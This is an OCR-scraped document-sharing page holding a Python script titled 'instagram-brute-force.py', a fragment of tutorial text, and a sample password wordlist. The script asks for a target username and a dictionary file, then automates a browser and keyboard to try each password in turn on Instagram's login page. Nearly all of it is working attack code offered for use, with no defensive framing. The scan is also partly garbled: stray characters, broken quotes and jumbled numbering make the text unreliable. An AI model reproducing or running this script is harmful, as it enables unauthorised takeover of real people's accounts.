0% found this document useful (0 votes)
7 views2 pages

JJ

Uploaded by

t57884838
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF or read online on Scribd
0% found this document useful (0 votes)
7 views2 pages

JJ

Uploaded by

t57884838
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF or read online on Scribd
You are on page 1/ 2
CO MAN TDAH FWHN WN NN NN NNNNN |S SS ss ssa sss SU WANA HBRWNH AFA DHL AN DUH BWHN = 31 from webbot import Browser from pynput.keyboard import Key, Controller import time username = input('Username: ') dictionary = input('Choose Dictionary: ') file = open(f'{dictionary}.txt', ‘r') bruteforce = [] for line in file: line = line.strip() bruteforce.append(line) file.close() web = Browser() keyboard = Controller() web.go_to( ‘ww. instagram.com' ) time.sleep(3) keyboard.press(Key.enter) keyboard. release(Key.enter) time.sleep(3) keyboard.press(Key.tab) keyboard. release(Key.tab) time.sleep(3) web. type(username) keyboard.press(Key. tab) keyboard. release(Key.tab) for brute in bruteforce: web.type(brute, into="Password") keyboard.press(Key.enter) keyboard. release(Key.enter) instagram-brute-force.py hosted with @ by GitHub view raw As you can see, in lines 4 and 5 we ask the user to input the username and the file for ‘ example, here is my dictionary file 1 jacko 2 1234 3 45561 4 limak 5 kasih 6 gurua 7 testi 8 12345 9 54321 10 54312 11. tools 12 jeemm 13. genoa 14. +trips 15. jacko 16 democ 17. repub 18 trust 19 thats 20 fives 21. chara 22 cters 23 can't 24 beuse 25 inthe 26 insta 27. gram 28 page 29 so000 30 uneed 31 six 32 chara 33 cters 34 #£=Real Password

You might also like